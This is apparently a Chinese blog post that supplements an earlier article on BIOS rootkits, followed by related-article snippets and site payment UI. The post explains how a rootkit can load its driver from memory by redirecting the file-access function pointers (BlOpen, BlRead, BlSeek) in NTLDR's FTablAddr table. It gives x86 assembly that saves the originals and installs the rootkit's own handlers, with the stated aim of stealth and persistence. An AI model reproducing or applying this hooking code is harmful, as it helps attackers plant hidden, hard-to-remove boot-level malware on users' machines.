BIOS rootkit的一点补充

最新推荐文章于 2024-04-23 09:44:59 发布
原创 最新推荐文章于 2024-04-23 09:44:59 发布 · 772 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种特殊的rootkit技术,通过重定向NTLDR中的文件访问函数,实现在内存中直接加载驱动程序。这种方法绕过了从硬盘加载驱动的传统方式,增强了rootkit的隐蔽性和持久性。
BIOS Rootkit:Welcome home,my Lord!的文章,觉得如何运行一个driver说的很模糊,好像还有点复杂,本人就补充一下这点:
可以直接调用NTLDR的BlLoadDeviceDriver函数,但问题在于该函数是从硬盘上加载driver,但现在rootkit的driver位于内存中,就必须重载NTLDR中访问硬盘的相关函数,它们是:
BlOpen,BlRead,BlSeek函数,在NTLDR中通过一个静态变量FTablAddr来存放这些函数的指针,只要将这些函数指针先指向我们的内存文件访问函数,就能实现内存加载driver.
对各个版本的操作系统,可以用IDA之类找到FTablAddr的地址,然后修改之中的相关指针下面是一段代码:
;saving funAddr:
    mov eax,FTablAddr
    mov ebx,[eax]
    push dword ptr [ebx+8]    ;openFun
    push dword ptr [ebx+12]    ;readFun
    push dword ptr [ebx+20]    ;seekFun
   
    mov eax,MyOpen
    call cntFunAddr   
    mov dword ptr [ebx+8],eax
   
    mov eax,MyRead
    call cntFunAddr   
    mov dword ptr [ebx+12],eax
   
    mov eax,MySeek
    call cntFunAddr   
    mov dword ptr [ebx+20],eax 
BootLoader:真实世界中的Dell BIOS Rootkit源代码-Source code world
03-25
在这个特定的主题中,我们聚焦于Dell BIOS Rootkit,这是一种隐藏在BIOS(基本输入输出系统)中的恶意软件,能够深度潜伏并难以检测。 BIOS是计算机启动时最先运行的固件,它控制着硬件初始化,并为操作系统提供...
AnalyzeReplaceDell9010:真实世界中的BIOS Rootkit滴管源代码-Source code world
03-25
【标题】"AnalyzeReplaceDell9010:真实世界中的BIOS Rootkit滴管源代码-Source code world" 提供的是一个针对戴尔9010型号计算机的BIOS Rootkit分析与替换的案例研究。BIOS(基本输入输出系统)是计算机启动时最先...
UEFI BIOS Rootkit Analysis
weixin_33744854的博客
04-23 256
catalog 1. BIOS简介 2. UEFI BIOS 3. EFI编程简介 4. UEFI Rootkit   1. BIOS简介 BIOS("Basic Input Output System 基本输入输出系统),它是一组固化到计算机内主板上一个ROM芯片上的程序,它保存着计算机最重要的基本输入输出的程序、开机后自检程序和系统自启动程序,它可从CMOS中读写系统设置...
BIOS Rootkit
摔不死的笨鸟的博客
03-26 753
国内外对于BIOS Rootkit的检测研究目前尚处于起步阶段。 Rootkit可分为应用程序级Rootkit、系统工具级Rootkit和内核级Rootkit三个类型,我们今天讨论的就是内核级BIOS Rootkit。 自BIOS芯片改用为可擦写芯片(如FlashROM、EPROM)以来,在BIOS芯片里植入程序就变 得可能。最早,BIOS厂商选用这类芯片是为了方便BIOS日后的程序升级工作。然而...
[>>蓝屏出品>>]ACPI BIOS RootKit 实践
生命的守望
02-12 2147
头衔: 无名氏门派: 使徒十三  等级: 大天使 信息:   威望: +5 积分: 2081  现金: 5904 雷傲元 存款: 2552072 雷傲元 贷款: 没贷款 来自: 保密  发帖: 1916 篇 精华: 8 篇 在线: 54 时 10 分 45 秒 注册: 2002/08/05 08:43am 造访: 2006/02/11 08:40pm  消息 查看 搜索 好友 复制 引用 回复 只
BIOS Rootkit:深度探索隐形的安全威胁与防御
gitblog_00063的博客
04-23 540
BIOS Rootkit:深度探索隐形的安全威胁与防御 去发现同类优质开源项目:https://gitcode.com/ 一、项目简介 BIOS Rootkit 是一个开源项目,旨在研究和理解恶意软件如何利用BIOS(基本输入输出系统)层进行攻击,以及如何防范此类威胁。这个项目不仅揭示了潜在的安全漏洞,也为安全研究人员和系统管理员提供了宝贵的学习资源。 二、技术分析 1. BIOS 感染机制 BI...
真实的SMM Rootkit——BIOS SMI句柄的逆向与钩挂_很好的一篇文章在黑客学习基地上看到的和大家分享
Henrykobe的专栏
08-23 5751
摘自:黑防 文章作者:fahrenheit 1 引言         本文将探索一些BIOS中的SMI代码,所使用到的固件都来自于ASUS(华硕)的主板,尤其是基于Intel P45硬件的ASUS P5Q系列平台。ASUS的BIOS是基于AMIBIOS 8实现的,因此我们的工作可以延伸应用到所有使用了AMI BIOS固件的BIOS平台。而且SMM作为x86架构的特征之一,各种BIOS
BIOS Rootkit实现与检测技术深度分析
### BIOS Rootkit实现分析与检测技术研究 #### 1. BIOS简介 BIOS(Basic Input/Output System,基本输入输出系统)是计算机中最基础的固件之一,它负责在计算机启动时进行硬件的初始化和系统设置,为操作系统的加载...
Dell BIOS Rootkit源代码深度解析
资源摘要信息:"BootLoader:真实世界中的Dell BIOS Rootkit源代码" 知识点: 1. BIOS和BootLoader概念:BIOS(Basic Input Output System)是计算机启动时加载的第一个软件,负责初始化硬件设备并为操作系统的启动...
BIOS Rootkit滴管源代码解析:Dell9010实操
资源摘要信息: "AnalyzeReplaceDell9010" 指的是一份对Dell 9010台式电脑中的BIOS Rootkit技术进行分析的源代码。这份代码在开源社区中公开,用于教育和研究目的。BIOS(基本输入输出系统)是个人电脑中最先加载运行...
研究人员称rootkit黑客代码可隐藏在BIOS
清炒苦瓜的专栏
10-16 839
在上周三的“BlackHat”会议上,一名研究人员表示,采用rootkit技术的黑客可以将他们的恶意代码隐藏在PC的BIOS闪存内,这一策略使得安全软件要发现、清除恶意软件变得更困难了。 在“BlackHat”会议上发表演讲时,英国Next-Generation安全软件公司的首席安全顾问海斯曼阐述了这一威胁。他说,黑客可以利用“电源配置和电源接口”(ACPI)及其编程语言在BIOS闪存中部
什么是 Rootkit
南北极之间
07-06 6441
常见的rootkit定义是一种恶意软件程序,它使网络犯罪分子能够在不被检测到的情况下访问和渗透计算机中的数据。它涵盖了旨在感染计算机,为攻击者提供远程控制并长时间保持隐藏的软件工具箱。因此,Rootkit是最难发现和删除的恶意软件之一,并且经常用于窃听用户和对计算机发起攻击。Rootkit恶意软件可以包含多个恶意工具,其中通常包括用于启动分布式拒绝服务(DDoS)攻击的机器人;可以禁用安全软件,窃取银行和信用卡详细信息以及窃取密码的软件;和击键记录器。Rootkit 通常为攻击者提供进入计算机的后门,使他们
Kafka在windows下单机版安装步骤
yandao的博客
09-21 417
准备 安装JDK java version "1.8.0_231" Java(TM) SE Runtime Environment (build 1.8.0_231-b11) Java HotSpot(TM) 64-Bit Server VM (build 25.231-b11, mixed mode) 下载kafka_2.12-2.1.1 http://kafka.apache.org/downloads https://archive.apache.org/dist/kafka/2.2.1/ka
BIOS Rootkit:Welcome home,my Lord!
热门推荐
天之流
05-11 1万+
                    [BIOS RootKit:Welcome Home,My Lord!...?]                    [Author ]: Icelord[Contact]: icelord@sohu.com[Data   ]: @2007/04/26->...    本文介绍一个简单BIOS rootkit的简单设计过程    意在抛砖引玉,期待高手
彻底无处可逃:研究人员展示BIOS级底层安全攻击
jehuyang的博客
04-24 1618
x86处理器爆出安全漏洞不久,研究人员们又找到了另一种通过BIOS发起攻击的方法,任何系统都无法幸免,而且这次利用的并非安全漏洞,所以更加防不胜防。Core Security Technologies安全公司的Anibal Sacco和Alfredo Ortega在CanSecWest安全会议上展示了他们的最新发现:将一小段代码植入BIOS,轻松就获得了整台电脑的全部控制权,即使重启系统甚至刷新B...
实用级反主动防御rootkit设计思路
08-08 1563
作者:白远方 (ID: baiyuanfan, baiyuanfan@163.com, baiyuanfan@hotmail.com)June 18, 2007关键字:rootkit,反主动防御,网络监控,ring0,mcafee8.5i,KIS6,ZoneAlarm Pro,实用级产品测试目录:反主动防御rootkit的产生背景及其必要性反网络访问主动防御反API钩子进程行为主动防御反系统Not
rootkit技术
sdulibh的专栏
02-25 6633
熬夜写llroot,写的头有些晕了,代码也有点乱,所以停下来歇歇;就又去逆向昨天下的那个rootkit,搞了1个多小时,头又晕了,才搞了不到一半,夜深人静的时候,孤孤单单,没有美女陪,不爽啊.想想好长时间没有在这个blog上写技术文章了,于是就转来下面一篇文章,文章比较老了,针对linux2.2内核的,但是基本的思路是没有失效的.正好这学期的操作系统课程考试也打算让研究生写一些类似的程序,所以贴在
6大手动杀毒软件
weixin_34318956的博客
11-02 268
1. sreng System Repair Engineer (SREng) 是一款计算机安全辅助和系统维护辅助软件。主要用于发现、发掘潜在的系统故障和大多数由于计算机病毒造成的破坏,并提供一系列的修改建议和自动修复方法。 2.冰刃这是一斩断黑手的利刃, 它适用于Windows 2000/XP/2003 操...
基于GEC6818平台的五子棋人机对战系统设计与实现
最新发布
11-25
五子棋作为一种广为人知的策略性棋盘游戏,其基本规则易于掌握。在选定人机对战模式后,由程序执黑先行,用户执白应对。双方依次在棋盘上落子,任何一方在横向、纵向或斜向形成连续五个或更多同色棋子即获胜。 项目资源涵盖多个技术领域的程序代码,涉及前后端开发、移动终端应用、操作系统、智能系统、物联网技术、信息管理系统、数据存储方案、硬件设计、大数据处理、教学资料、多媒体处理及网站构建等多个方向。具体技术实例包括嵌入式平台如STM32与ESP8266,编程语言如PHP、QT、C++、Java、Python、C#,系统开发如Linux与iOS,以及电子设计自动化工具和实时操作系统等。 主要技术栈包含服务端开发语言Java、Python及Node.js,后端框架Spring Boot与Django,前端技术React、Angular与Vue,界面设计框架Bootstrap与Material-UI,数据库系统MySQL、PostgreSQL和MongoDB,缓存工具Redis,以及容器化部署方案Docker与Kubernetes。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值